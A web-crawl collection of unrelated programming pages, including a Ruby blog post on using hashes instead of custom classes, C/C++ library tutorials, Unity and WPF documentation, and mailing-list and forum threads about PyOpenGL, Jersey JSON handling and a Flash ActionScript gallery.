https://forums.adobe.com/thread/913528
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Last updated on October 1st, 2017 |
In this Ionic Firebase tutorial you’ll learn how to integrate Firebase into your Ionic Framework app.
If you don’t know what Firebase is, it’s:
A suite of Google tools and infrastructure that will help you build better apps and grow successful businesses.
In plain English, it is a Backend as a Service that offers a wide range of services, like push notifications, analytics, a Firebase real-time database and more.
We are going to be building an app from scratch, and go over the process of integrating it with Firebase. We’ll break down the process in 4 different steps:
Step #1: Make sure your development environment is up to date.
Before writing any code, we are going to take a few minutes to install everything you need to be able to build this app, that way you won’t have to be switching context between coding and installing.
The first thing you’ll do is install nodejs.
The second thing you’ll do is make sure you have Ionic, and Cordova installed, you’ll do that by opening your terminal and typing:
$ npm install -g ionic cordova
Depending on your operating system (mostly if you run on Linux or Mac) you might have to add
sudo before the
npm install.... command.
Step #2: Create the App
Now that you made sure everything is installed and up-to-date, you’re ready to create your new Ionic app.
To do this, go ahead and open your terminal, move to wherever it is that you save your projects and start the app:
$ cd Development $ ionic start myApp blank $ cd myApp
If you’re new to the terminal, what those commands do is to:
- Move you into the Development folder.
- Create a new Ionic 2 app using the blank template and calling it myApp.
- Move into the new app’s folder.
From now on, whenever you are going to type something in the terminal it’s going to be in your app’s folder unless I say otherwise.
The npm packages that come with the project
When you use the Ionic CLI to create a new project, it’s going to do a lot of things for you, one of those things is making sure your project has the necessary
npm packages it needs.
That means, the
start command is going to install all of the requirements and more, here’s what the
package.json file should look like:
{ "dependencies": { "@angular/common": "4.1.3", "@angular/compiler": "4.1.3", "@angular/compiler-cli": "4.1.3", "@angular/core": "4.1.3", "@angular/forms": "4.1.3", "@angular/http": "4.1.3", "@angular/platform-browser": "4.1.3", "@angular/platform-browser-dynamic": "4.1.3", "@ionic-native/camera": "3.12.1", "@ionic-native/core": "3.12.1", "@ionic-native/splash-screen": "3.12.1", "@ionic-native/status-bar": "3.12.1", "@ionic/storage": "2.0.1", "firebase": "4.1.1", "ionic-angular": "3.5.0", "ionicons": "3.0.0", "rxjs": "5.4.0", "sw-toolbox": "3.6.0", "zone.js": "0.8.12" }, "devDependencies": { "@ionic/app-scripts": "^1.3.7", "typescript": "2.3.4" } }
Depending on when you read this, these packages might change (specially version numbers) so keep that in mind, also you can leave a comment below if you have any questions/issues/problems with this.
Step #3: Install Firebase
Now that everything is ready to be used, you’re going to install Firebase so we can access its SDK from inside our app. To do this, open your terminal and run:
$ npm install --save firebase
That will install the latest version of the Firebase JavaScript SDK, which is what we’ll use in this example.
Step #4: Initializing Firebase
To do this, we’re going to open our
app.component.ts file, and inside the constructor, we’re going to add this snippet of code:
firebase.initializeApp({
  apiKey: "",
  authDomain: "",
  databaseURL: "",
  storageBucket: "",
  messagingSenderId: ""
});
That will initialize the app, you’ll need to add the keys for your own Firebase app, you can find those keys in your Firebase’s Console:
For that to work, don’t forget to import Firebase into the file:
import firebase from 'firebase';
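Putting the import and the initialization together, app.component.ts could look roughly like this sketch (the config values are placeholders, and the generated template will also inject things like StatusBar and SplashScreen, which are omitted here):

import { Component } from '@angular/core';
import { Platform } from 'ionic-angular';
import firebase from 'firebase';

import { HomePage } from '../pages/home/home';

@Component({
  templateUrl: 'app.html'
})
export class MyApp {
  rootPage: any = HomePage;

  constructor(platform: Platform) {
    // Initialize Firebase as soon as the root component is constructed.
    firebase.initializeApp({
      apiKey: "<your-api-key>",
      authDomain: "<your-project>.firebaseapp.com",
      databaseURL: "https://<your-project>.firebaseio.com",
      storageBucket: "<your-project>.appspot.com",
      messagingSenderId: "<your-sender-id>"
    });
  }
}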
Bringing it all together
Right now you should have the skeleton of your app and should be ready to start coding.
Configuring this kind of things isn’t that easy, so you should be proud of what you accomplished if you’re running into any issues remember the steps we followed:
- Make sure your development environment is up to date.
- Create the App
- Install Firebase
- Initialize your Firebase App.
Now you should be ready to start adding functionality to your app.
|
https://javebratt.com/ionic-firebase-setup/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Last updated on September 30th, 2017 |
Have you tried to get Ionic Twitter login working with Firebase? There was a change when Firebase updated to V3 that made all the cool sign-in with pop-up and redirection stop working with Cordova apps. It sucked!
But then I realized something, yeah, it sucked for us as developers, but it pushed us to find a better way for our users, and it was to find the native plugins.
Why is it better for our users? Because when you used ionic twitter login in the previous version it had a pop-up to authorize the app, that pop-up was usually a browser one, and the user had to enter their twitter credentials half of the time. And that really sucks (I’m looking at you Instagram!)
That really sucks, why would I want to enter my credentials, can’t they just have a cool native pop-up so I can click and authorize it?
We’re going to be using the twitter-connect plugin and connecting to twitter using the Fabric SDK, that way, we can give a native experience to our users, instead of making our users think/do too much.
In this post, you’ll learn:
- How to set up your Fabric account.
- How to set up the Twitter Connect plugin (from Ionic Native)
- How to use the plugin to get the login token.
- Use those token credentials to sign your user into Firebase.
You’ll be able to give your users a better experience, similar to the picture below:
Ready to get started?
Make sure to get the code directly from Github so you can follow along with the post:.
Ionic Twitter Login
We’re going to break down the process in 6 steps:
- Step #1: Set up your Fabric Account.
- Step #2: Get your Fabric API Key.
- Step #3: Create your app in Fabric.
- Step #4: Install the Twitter Connect Plugin
- Step #5: Enable Twitter Authentication in Firebase.
- Step #6: Write the code to get the token from Twitter and sign the user in.
I think that intro was too long, so let’s get busy.
Step #1: Set up your Fabric Account.
How many times have I said something sucked in this post? This is going to be another one, this process sucks! 😛
There’s a lot of work on setting up your fabric account, including running Android Studio (or Xcode) installing plugins, and running a native app.
In the next few lines I’ll do my best to explain it so you don’t have to bang your head against the keyboard (like I did).
The first thing you’ll do is go to Fabric’s website and create an account
After you signup, they’ll send you a confirmation email so you can get started, go to your email and click on the link they sent you.
It will take you to a page where you can start working with Fabric, you’ll add a team name, and then it will ask you what platform you’re developing for, this is where things get tricky.
You can either select iOS or Android, one little advise, choose the one where you have the SDK and native IDE up to date, so if your Android Studio installation and Android SDK are up to date, go ahead and pick android, if not, then pick iOS.
When you pick the platform you’ll go through an on-boarding process (yup, they actually think this is good), just read through every single message and follow the instructions step by step
But basically, you need to install Fabric’s plugin in your IDE, then install the Twitter SDK into your app through the plugin, the plugin will show you how to install it, it even has a one-click install that adds everything (at least on Android it does).
Once everything is installed, you need to build and run the app, once you do, it will send a signal to Fabric letting them know that you have successfully installed and ran the SDK, which will let you pass this “pending” page:
If it doesn’t happen automatically, feel free to comment and I’ll help you debug.
Step #2: Get your Fabric API key
I don’t know why, but there’s no easy way to get this, like, I would expect you could go into settings and copy your API key, but no, that’s not what they wanted I guess.
Thankfully, Manifest Web Design, the awesome people that wrote the Twitter Connect Plugin already knew this and they had instructions on how to get your API key.
- First, go to.
- Look for the Add Your API Key block of code
- Inside the <meta-data /> block, you'll find the value for your Fabric API key.
Easy, right? 😛
Step #3: Create your Fabric APP
It’s time to create the app we’ll be using to ask for the user’s permissions, this on the easier side of things, all you have to do is go to and click the “ADD” button, it will ask you for some information and you’ll be able to create the app.
The app will have some information on it, you’ll need to copy the CONSUMER KEY and the CONSUMER SECRET, since we’ll need them later for the plugin setup.
Step #4: Install the Twitter Connect Plugin
Now it’s time to install the Twitter Connect Plugin, for that we first need to have an Ionic Framework app created, if you don’t know how to create an Ionic app and initialize Firebase then first read this post and come back to this after you’re done.
Now that your app is created, open your terminal (you should be inside your app’s folder) and install the twitter connect plugin:
$ ionic plugin add twitter-connect-plugin --variable FABRIC_KEY=<FabricAPIKey> $ npm install --save @ionic-native/twitter-connect
Remember to change
<FabricAPIKey> with your own API key (the one we got in Step #2).
Once the plugin is installed, you’ll need to do some config, go ahead and open the
config.xml file that’s in the project root, and right before the closing
</widget> tag, add this:
<preference name="TwitterConsumerKey" value="<Twitter Consumer Key>" /> <preference name="TwitterConsumerSecret" value="<Twitter Consumer Secret>" />
Remember to change those values with the CONSUMER KEY and the CONSUMER SECRET we got in Step #3 when we created the app in Fabric.
We need to declare the
twitter-connect package as a provider in
app.module.ts now:
import { StatusBar } from '@ionic-native/status-bar';
import { SplashScreen } from '@ionic-native/splash-screen';
import { TwitterConnect } from '@ionic-native/twitter-connect';

@NgModule({
  ...,
  ...,
  ...,
  providers: [
    {provide: ErrorHandler, useClass: IonicErrorHandler},
    StatusBar,
    SplashScreen,
    TwitterConnect
  ]
})
export class AppModule {}
That’s it, everything in your app is set up and ready to be used.
Step #5: Enable Twitter Authentication in Firebase.
Now you need to tell your Firebase app to allow users to Sign-In with Twitter, for that go to your Firebase Console
Choose your app and inside the Authentication Tab go to “Sign-In Method” and enable Twitter, it’s going to ask you for an API Key and Secret, you’ll use the same you just used, the ones for the app you created in Fabric.
Step #6: Write the code to get the token from Twitter and sign the user in
We can finally start coding now 🙂
The first thing we’ll do is create a button so our user can log-in, so go ahead and open
home.html and remove the placeholder content, then add a button:
<ion-content padding>
  <button ion-button block (click)="twLogin()" *ngIf="!userProfile">
    <ion-icon name="logo-twitter"></ion-icon>
    Login with Twitter
  </button>
</ion-content>
The button is calling a function that we’ll create in the Class that will handle the login part, it also has an
ngIf tag, that makes sure you only see the button if you’re logged out (we’ll create that logic later).
If the user is logged-in, we want to show the user’s profile picture, twitter name, and full name.
<ion-content padding>
  <button ion-button block (click)="twLogin()" *ngIf="!userProfile">
    <ion-icon name="logo-twitter"></ion-icon>
    Login with Twitter
  </button>

  <ion-item *ngIf="userProfile">
    <ion-avatar item-left>
      <img [src]="userProfile.photoURL">
    </ion-avatar>
    <h2>{{ userProfile.displayName }}</h2>
    <h3>{{ userProfile.twName }}</h3>
  </ion-item>
</ion-content>
By the end, that page will look something like this:
Now that we have that part covered, then it’s time to import everything we’ll need into
home.ts
import { Component } from '@angular/core';
import { NavController } from 'ionic-angular';
import { TwitterConnect } from '@ionic-native/twitter-connect';
import firebase from 'firebase';
- We’re importing
TwitterConnectbecause that’s the ionic native package to handle the plugin.
- And we’re importing Firebase so we can sign-in our users.
Then, right before the constructor, we need to add one variable:
userProfile: any = null;
The
userProfile will hold the information we want to show about the user.
Now inject TwitterConnect in the constructor:
constructor(public navCtrl: NavController, private twitter: TwitterConnect) {}
It’s time to move to our login function, we’re going to create the function and add the login functionality for twitter, go ahead and add this to your code:
twLogin(): void {
  this.twitter.login().then(
    response => {
      console.log(response);
    },
    error => {
      console.log("Error connecting to twitter: ", error);
    });
}
Right there you’ll get all the twitter functionality, go ahead and run it in a phone, you should see the blue login button, when you click it you’ll get a screen like this:
If you’re inspecting the device, you’ll notice it logs the response to the console, the response looks something like this:
{
  userName: 'myuser',
  userId: '12358102',
  secret: 'tokenSecret',
  token: 'accessTokenHere'
}
We need to pass now that token and secret to Firebase so our user can log into our application.
For that first, create a credential object using the
TwitterAuthProvider method, and then pass that object to Firebase:
twLogin(): void {
  this.twitter.login().then(
    response => {
      const twitterCredential = firebase.auth.TwitterAuthProvider
        .credential(response.token, response.secret);

      firebase.auth().signInWithCredential(twitterCredential)
        .then(userProfile => {});
    },
    error => {
      console.log("Error connecting to twitter: ", error);
    });
}
We’re using
const twitterCredential = firebase.auth.TwitterAuthProvider.credential(response.token, response.secret);
To create a credential object and then pass it to the
signInWithCredential Firebase method, then we just need to handle the return of that function, we’ll just add the response to the
this.userProfile variable so we can use it in our HTML
twLogin(): void {
  this.twitter.login().then(
    response => {
      const twitterCredential = firebase.auth.TwitterAuthProvider
        .credential(response.token, response.secret);

      firebase.auth().signInWithCredential(twitterCredential)
        .then(userProfile => {
          this.userProfile = userProfile;
          this.userProfile.twName = response.userName;
          console.log(this.userProfile);
        }, error => {
          console.log(error);
        });
    },
    error => {
      console.log("Error connecting to twitter: ", error);
    });
}
We’re also adding
this.userProfile.twName = response.userName; because the firebase authentication object doesn’t have that information for us.
And that’s it, you now have a fully working authentication system using Twitter and Firebase 🙂
|
https://javebratt.com/ionic-twitter-login/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Module to work with bencoded strings.
PyBencoder - your bencoded strings module
What is a Bencoded String?
Bencode (pronounced like B encode) is the encoding used by the peer-to-peer file sharing system BitTorrent for storing and transmitting loosely structured data.
For more info on bencoding check out.
It provides:
- decoding of the different bencoded elements
- encoding of the allowed types (byte strings, integers, lists, and dictionaries).
Requirements
Requires Python 3 or later
Installation
python setup.py install
To run test suite:
python setup.py test
Usage
Import the module
from pybencoder.bencoder import PyBencoder
Encoding
Encoding is very easy to do. Just pass as an argument your data to encode method. It will automagically call the right encoder for you.
ben = PyBencoder()
ben.encode(123)                                 # encode an integer
'i123e'
ben.encode('123')                               # encode a string
'3:123'
ben.encode([1, 2, 3])                           # encode a list
'li1ei2ei3ee'
ben.encode([1, 2, [4, 5]])                      # encode a slightly more complex list
'li1ei2eli4ei5eee'
ben.encode({ 'one': 1, 'two': 2, 'three': 3 })  # encode a dictionary
'd5:threei3e3:twoi2e3:onei1ee'
Decoding
Decoding is also easy to deal with. Just pass the bencoded string to the decode method. Two mentions:
- the first char of your bencoded string must be actually bencoded data, no garbage is allowed
- at the end of the bencoded string there might be garbage data; after the extraction, you can also retrieve it
ben = PyBencoder()
ben.decode(‘i123e’) # decode an integer 123 ben.decode(‘i123esomeothergarbagedata’) # decode an integer with garbage data at the end ben.get_left() # gets what’s left -> ‘someothergarbagedata’
ben.decode(‘3:123somegarbage’) # decode a 3 chars string
ben.decode(‘li1ei2eli4ei5eee’) # decode a list [1, 2, [4, 5]]
|
https://pypi.org/project/PyBencoder3/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
How often have you coded up a simple Windows Form application to clear up the difference between similar events? Where does TextChanged get fired in the sequence KeyDown, KeyPress, KeyUp. When exactly does Load get fired in relation to other events on a complex control?
ControlInspector is designed to answer these and many other questions by hooking all events on an arbitrary windows form control; in a user control; or in a complete windows form. It will recurse through the controls collection and hook events on every sub control, and has special handling for context menus and main menus on forms to make sure that these don't get excluded.
In summary, ControlInspector is like a native .NET version of Spy++ for .NET events.
This article is intended to accompany ControlInspector and give some insight into the techniques it uses. If you just want to use ControlInspector to diagnose your own applications, or to understand Windows Form events better then just download the compiled version of the software, and don't worry about the source!
When you first open Control Inspector you will be presented with a blank screen. You can use the File/Open option to open an arbitrary assembly (.net exe or dll file); you will then be presented with a list of Windows Forms Controls and Forms that are part of the assembly. The entry you select will be loaded into memory and instantiated either by hosting it in a form, or if it is a form it will be constructed directly. You can also use the File/Windows Forms option to display a list of available controls from the System.Windows.Forms namespace. Note that you won't be able to construct some of these controls (eg ButtonBase) because although they derive from Control they are not directly usable.
If the control is hosted in a form, you will see the ControlHostForm above. It has been written to display a red grid around your control so you can see where the control you are analysing ends.
The first tab of the event viewer, "All Events", shows a complete list of events trapped by ControlInspector in the sequence that they fired. You can look at individual controls by clicking on their individual tabs. When you have a particular control in focus, you are able to use the property editor to make on-the-fly changes to the control (useful to see which events are fired by a change, and in what order). For example, if you enable anchoring you can then see the resize events generated by resizing the hosting form.
The events are hooked before the control is displayed, so you will get all the initialisation events; and if you close the hosting form, then you will see the events fired until the control dies.
You are able to uncheck particular events to handle either by focusing on the control and using the checked list box, or by right clicking on a particular event in the event view and selecting "stop tracking this event". This option will only stop tracking events for this individual control. There are options to stop tracking groups of events for all controls (for example, all mouse movement related events) to stop your event list getting over populated.
If you aren't interested in ControlInspector under the covers, I suggest you stop reading now!
Last week I attended a Guerilla .NET course hosted by DevelopMentor. I can highly recommend this training company as the whole week was inspiring, and the instructors highly knowledgeable: You know who you are guys!
The instructors issued a challenge for the class to come up with the best program that they could using any of the techniques that they had learnt during the week. The challenge would be judged on Thursday, so I had just a few days to get busy.
One of the topics covered on the course was Reflection and I decided to use this to discover information about Windows Forms controls and hook on to their events.
ControlInspector also has to use Reflection.Emit to generate a function and delegate that exactly corresponds to the event type to allow it to hook on to arbitrary events. It can only hook on to events that following the function prototype:
void eventName(object sender, eventargstype x)
where eventargstype derives from the EventArgs type. All the standard WindowsForms events do; and your events should also use this structure so there should be no problems with this approach.
The main part of the code is split between MainForm.cs which contains the UI and code for hooking on to events, and GenerateEventAssembly.cs which generates the IL for a function which matches a given delegate. Lets talk about the way the events are hooked in the first place:
void HookEvents(object o, string name) {
Type t = o.GetType();
...
Using Reflection, we step trhough all the events on a particular type. The EventHandlerType will be the type of the delegate required to hook on to this event; eg: void EventHandler(object sender, EventArgs e)
void EventHandler(object sender, EventArgs e)
foreach(EventInfo ei in t.GetEvents())
{
// Discover type of event handler
Type eventHandlerType = ei.EventHandlerType;
// eventHandlerType is the type of the delegate
// (eg System.EventHandler)
// what we need, is to find the type of the second parameter of the
// delegate, eg System.EventArgs
MethodInfo mi = eventHandlerType.GetMethod("Invoke");
ParameterInfo[] pi = mi.GetParameters();
Now comes the magic. The function GetEventConsumerType generates a class dynamically that has a method "HandleEvent" of exactly the right types. This class is derived from ControlEvent, which contains a function void GenericHandleEvent(object sender, object eventargs) so the generated code is kept to a minimum (I can't write IL for toffee: I wrote a class in C# which did the required type conversion, ran ILDASM on it, then used that as a basis to automatically generate these arbitrary types).
// Get a class derived from ControlEvent which has a HandleEvent method
// taking the appropriate parameters
ControlEvent ce
= GenerateEventAssembly.Instance.GetEventConsumerType(pi[1].ParameterType);
// Hook onto this control event to get the details of all events fired
ce.ControlName = name;
ce.EventName = ei.Name;
ce.EventTrackInfo = trackInfo;
ce.EventFired += new EventHandler(eventFired);
controlEventList.Add(ce);
// Wire up the event handler to our new consumer
Delegate d = Delegate.CreateDelegate(eventHandlerType, ce, "HandleEvent");
ei.AddEventHandler(o, d);
}
...
Finally, if this is a control type, we recurse through sub-controls
if (o is Control) {
Control c = (Control) o;
if (c.Controls != null) {
foreach(Control subControl in c.Controls) {
HookEvents(subControl, name + "/" + ControlName(subControl));
}
}
...
}
The code to do the IL generation is quite well commented, so I won't go into greater detail about that here.
void AddEventsToTreeView(ControlEvent ce, TreeView treeView,
bool includeControlName)
Because of the generic way in which events are hooked up, there is a test user control contained in the ControlInspector.exe - UserControlTest. This contains a button which fires off a user-defined event just to prove that everything is working correctly.
Removing the tab pages from the form when a new control is loaded exhibits a strange bug in the 1.0 framework which I have tried my best to work around. My thanks to instructor Ian Griffiths who helped me with this issue.
I didn't win the Thursday Challenge!
The current project has been tested under VS.NET 2002 and VS.NET 2003, and it works fine on both of them. The downloadable file is a VS.NET 2002 project, but works fine if you upgrade it. I will be releasing a new version with some more changes soon.
1.0 Initial release
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
Reflection.Emit
|
https://www.codeproject.com/Articles/3317/ControlInspector-monitor-Windows-Forms-events-as-t?msg=855358
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Conditional Risk Premia in Currency Markets and Other Asset Classes
1 Conditional Risk Premia in Currency Markets and Other Asset Classes Martin Lettau Matteo Maggiori and Michael Weber May 3 Abstract rationalize the cross section of equity, equity index options, commodity, sovereign bond and currency returns, thus offering a unified risk view of these asset classes. In contrast, popular models that have been developed for a specific asset class fail to jointly price other asset classes. JEL classification: F3, F3, G, G Keywords: Carry Trade, Commodity Basis, Downside Risk, Equity Cross Section Haas School of Business, University of California at Berkeley, Berkeley, USA. Corresponding author: Stern School of Business, New York University, New York, USA. We thank George Constantinides, Eugene Fama, Kenneth French, Andrea Frazzini, Jens Jackwerth, Yoshio Nozawa, Lasse Pedersen, Alexi Savov, Fan Yang, and Adrien Verdelhan for sharing their data. We also thank for their useful comments Riccardo Colacito (discussant), Harald Hau (discussant), Ralph Koijen (discussant), Toby Moskowitz, Lasse Pedersen, Adrien Verdelhan (discussant) and seminar participants at Black Rock, UT Austin, UC Berkeley, University of Chicago Booth Junior Faculty Symposium, Duke University, University of Mannheim, University of Michigan, NBER Asset Pricing meeting, New York University, Princeton University, University of Southern California, AQR Insight Award, AEA, EFA, EEA and ESNAW, and SFS Finance Cavalcade meetings. Financial support from the Clausen Center and the Coleman Fung Center at UC Berkeley are gratefully acknowledged. Maggiori also thanks the International Economics Section, Department of Economics, Princeton University for hospitality during part of the research process for this paper. This paper was awarded the 3 AQR Insight Award.
2 Foreign exchange is a potentially risky investment and the debate on whether currency returns can be explained by their association with risk factors remains ongoing. We find that the cross section of currency returns can be explained by a risk model where investors are concerned about downside risk. High yield currencies earn higher excess returns than low yield currencies because their co-movement with aggregate market returns is stronger conditional on bad market returns than it is conditional on good market returns. We find that this feature of the data is characteristic not only of currencies but also of equities, commodities and sovereign bonds, thus providing a unified risk view of these markets. The carry trade in foreign exchange consists of investing in high yield currencies while funding the trade in low yield currencies. This trading strategy has historically yielded positive returns because returns on high yield currencies are higher than returns on low yield currencies. A number of explanations for this cross-sectional dispersion have been advanced in the literature, varying from risk based to behavioral. We provide a risk-based explanation by showing that the downside risk capital asset pricing model (DR-CAPM) prices the cross section of currency returns. We follow Ang, Chen, and Xing (6), who study equity markets, by allowing both the market price of risk and the beta of currencies with the market to change conditional on the aggregate market return. Intuitively, the model captures the changes in correlation between the carry trade and the aggregate market returns: the carry trade is more correlated with the market during market downturns than it is during upturns. Correctly capturing the variations in betas and prices of risk is crucial to the empirical performance of the DR-CAPM. It also clarifies why the unconditional CAPM does not explain the cross section of currency returns. While high yield currencies have higher betas than lower yield currencies, the difference in betas is too small to account for the observed spread in currency returns. We extend our results by testing the performance of the DR-CAPM jointly on currencies, various equity portflolios, equity index options, commodities and sovereign bonds. The variations in betas and prices of risk in the DR-CAPM can jointly rationalize the cross-sectional returns of all of these asset classes. This contrasts with the inability of a number of asset-class-specific models to price asset classes other than the one for which they have been built. The economic intuition behind our results is summarized in Figure. Across different asset classes such as currencies, commodities, and equities, assets that have higher exposure to downside risk, that is assets that have a higher downside beta (β ), earn higher excess returns even when
3 controlling for their CAPM beta (β). The top panel of Figure highlights this pattern in the data by plotting realized average excess returns versus the corresponding asset loading on downside risk (β β). The positive relationship between expected returns and downside risk is the crucial pattern behind the more formal econometric analysis of this paper. In contrast, the bottom panel of Figure shows why the CAPM cannot rationalize the returns of these asset classes. Within each asset class there is little dispersion in betas but a larger dispersion in realized returns. Across asset classes CAPM captures, at best, the average return of each asset class, but no strong systematic relationship appears. We compare the DR-CAPM with models based on principal component analysis (PCA) both within and across asset classes. Within each asset class the DR-CAPM captures the cross-sectional dispersion in returns summarized by the most important principal components. Across asset classes the DR-CAPM continues to capture expected returns with only two fundamental factors, while a PCA-based model requires as many as eight factors to generate similar explanatory power. This paper contributes to two strands of literature: the international finance literature on exchange rates and currency returns and the asset pricing literature on the joint cross section of returns of multiple asset classes. Among a vast international finance literature, Lustig and Verdelhan (7) provide an explanation for the cross section of currency returns based on the Durable Consumption CAPM (DC-CAPM). Burnside (b) and Lustig and Verdelhan () discuss the association of currency returns with consumption growth. Burnside, Eichenbaum, Kleshchelski, and Rebelo (), Burnside, Eichenbaum, and Rebelo (, 9), Burnside, Han, Hirshleifer, and Wang () focus on explanations of the carry trade such as investor overconfidence and peso problems. Lustig, Roussanov, and Verdelhan () (LRV) provide a model that employs the principal component analysis of currency returns. They show that currencies that load more heavily on the first two principal components, approximated by the returns on a dollar and carry trade portfolio respectively, earn higher excess returns on average. Menkhoff, Sarno, Schmeling, and Schrimpf () link the carry trade factor to exchange rate volatility. Our contribution to this literature is to provide an explanation of currency returns based on the conditional association of currency returns with a traditional risk factor, the market return. We not only reconcile our findings with the more statistical factors used in the literature, but also show that currencies are affected by the same aggregate risk that drives expected returns in other assets classes such as equities and commodities. See Sections I-II for the precise definition and estimation procedure of β and β.
4 A nascent literature is exploring the joint cross section of returns in multiple asset classes. Cochrane () emphasized this research agenda, which aims to reconcile the discount factors in different asset classes. In his American Finance Association presidential address he ponders: What is the factor structure of time-varying expected returns? Expected returns vary over time. How correlated is such variation across assets and asset classes? How can we best express that correlation as factor structure? [...] This empirical project has just begun, [...] but these are the vital questions. In recent and ongoing research Asness, Moskowitz, and Pedersen (), Frazzini and Pedersen (), Koijen, Moskowitz, Pedersen, and Vrugt () document that a number of cross-sectional phenomena such as value, carry, momentum, and the slope of the unconditional- CAPM-based capital market line that were previously only documented for specific asset classes are actually pervasive across multiple asset classes. We contribute to this literature by showing that the DR-CAPM can jointly reconcile the cross-sectional dispersion in returns across multiple asset classes. We also explore the factor structure by comparing the model to several PCA-based models. We find that PCA-based models tailored to a specific asset class are unable to price other asset classes, and that a PCA model based on the joint cross-section of multiple asset classes overestimates the number of risk factors. We view our results as a step in the research agenda emphasized by Cochrane (). We stress that the purpose of this paper is not to suggest that the DR-CAPM is the true model of all asset prices, nor is it to discourage the use of PCA to summarize patterns in asset returns. The purpose of this paper is to verify how much of the cross sectional variation in returns across asset classes can be rationalized by the association of returns, both unconditionally and conditionally, with a traditional risk factor, the market return. For this purpose and for completeness, we also report in Section V.E. a number of test assets the returns of which the DR-CAPM does not rationalize. In a separate online appendix we provide a number of details, robustness checks, and extensions of our results that are omitted in the main body of the paper, including a comparison of the DR-CAPM with PCA and co-skewness models. I Carry Trade, Cross-Sectional and Market Returns We follow Ang et al. (6) in allowing a differentiation in unconditional and downside risk. This captures the idea that assets that have a higher beta with market returns conditional on 3
low realization of the market return are particularly risky. The economic intuition underlying downside risk is simple: agents not only require a premium for securities the more their returns covary with the market return, but also, and even more so, when securities covary more with market returns conditional on low market returns. Markowitz (1959) was among the first to recognize the importance of downside risk, formalized in his semi-variance, in addition to his more canonical expected-return-variance framework.² While Ang et al. (2006) motivate the above insight using the disappointment aversion model of Gul (1991), further extended by Routledge and Zin (2010), a variety of models are potentially consistent with our findings.³ We stress that our contribution is to highlight a previously unknown pattern: the dependence of expected returns on downside risk across multiple asset classes. The previous literature had largely concluded that these asset classes had independent factor structures. The purpose of this paper is to systematically document this novel empirical pattern across a number of important cross sections and asset classes and we leave it to future work to provide specific theoretical models. To capture the relative importance of downside risk we propose that expected returns follow:

E[r_i] = β_i λ + (β_i⁻ − β_i) λ⁻,  where  β_i = cov(r_i, r_m) / var(r_m)  and  β_i⁻ = cov(r_i, r_m | r_m < δ) / var(r_m | r_m < δ),  i = 1, ..., N,  (1)

where r_i is the log excess return of asset i over the risk-free rate, r_m is the log market excess return, β_i and β_i⁻ are the unconditional and downside beta defined by an exogenous threshold (δ) for the market return, and λ and λ⁻ are the unconditional and downside prices of risk, respectively. This empirical framework is flexible in allowing variations both in the quantity and the price of risk while maintaining a parsimonious parametrization with a single threshold δ. Note that the model reduces to CAPM in the absence of differential pricing of downside risk relative to unconditional market risk, λ⁻ = 0, or if the downside beta equals the CAPM beta, β_i⁻ = β_i. As in the case of CAPM, the model also restricts the unconditional price of risk to equal the expected market excess return:

E[r_m] = λ,  (2)

² Markowitz (1959) [Ch. 9] notes that variance is superior with respect to (computational) cost, (analytical) convenience, and familiarity. (However), analyses based on semi-variance tend to produce better portfolios than those based on variance.
³ A variety of other asymmetrical CAPM models have been derived, for example: Leland (1999) and Harvey and Siddique (2000).
6 because both the unconditional and downside beta of the market with itself are equal to. To clarify the terminology used in this paper, notice that we employ the concept of conditionality in the context of realizations of states of the world: market return above or below a threshold. A part of the asset pricing literature has instead applied similar terminology in the context of time variation of expected returns and return predictability tests. We stress that while we do not allow for time variation in the betas or the prices of risk, but only for variation across realized states of the world, our empirical methodology is consistent with some predictability in expected returns. Since we test our model on sorted portfolios that capture a characteristic associated with expected returns, for example the interest rate differential, we allow for predictability generated by variation over time in this characteristic. Cochrane () notes the similarity between testing the model on sorted portfolios and testing the model on unsorted assets while allowing for time variation in instruments that proxy for managed portfolios. Our procedure, however, does not allow variation in expected returns through time for a fixed characteristic. For example, we capture the fact that the expected return for a specific currency pair varies through time as the corresponding interest rate differential varies, but we do not allow for the expected return of a specific currency pair to vary through time given a constant interest rate differential. Lustig et al. () similarly allow predictability only through variation in the interest rate differential. Finally, our model specification is similar to the one tested by Ang et al. (6) on equity portfolios. While the present specification has the convenience of both nesting CAPM and reducing the number of estimated coefficients in the cross-sectional regression to the price of downside risk λ, we report in the appendix the estimates for the specification in Ang et al. (6) for our benchmark test assets. A. Data We use the bilateral currency returns dataset in Maggiori (); details of the data are included in the online appendix and in the original reference. The data are monthly, from January 97 to March, and cover 3 currencies. We follow Lustig and Verdelhan (7) in defining a cross It is in principle possible to allow both the concept of conditionality used in this paper and the time variation in betas and prices of risk to co-exist within the same model. In the present context, this could be achieved by estimating time varying betas and lambdas. Since this would require extracting additional information from a potentially limited number of observations for the downstate, we opted to impose constant betas and lambdas through time. While we do not disregard the possibility of time varying parameters, we view our model choice as conservative given the available data and stress that this restriction is routinely imposed on asset pricing models especially when testing them on sorted portfolios.
section of currency returns based on their interest rate. We sort currencies into 6 portfolios, in ascending order of their respective interest rates. Since the dataset includes currencies for which the corresponding country has undergone periods of extremely high inflation and consequently high nominal interest rates, we split the sixth portfolio into two baskets: 6A and 6B. Portfolio 6B includes currencies that belong to portfolio 6 and that have annualized inflation at least % higher than US inflation in the same month. We also use an alternative sorting that only includes developed countries' currencies.⁶ In this case we sort the currencies into fewer than 6 baskets, to take into account the overall reduced number of currencies. We calculate one-month real-dollar bilateral log excess returns r_{t+1} as the sum of the interest differential and the rate of exchange rate depreciation of each currency with the US dollar:

r_{t+1} = i*_t − i_t − Δs_{t+1},

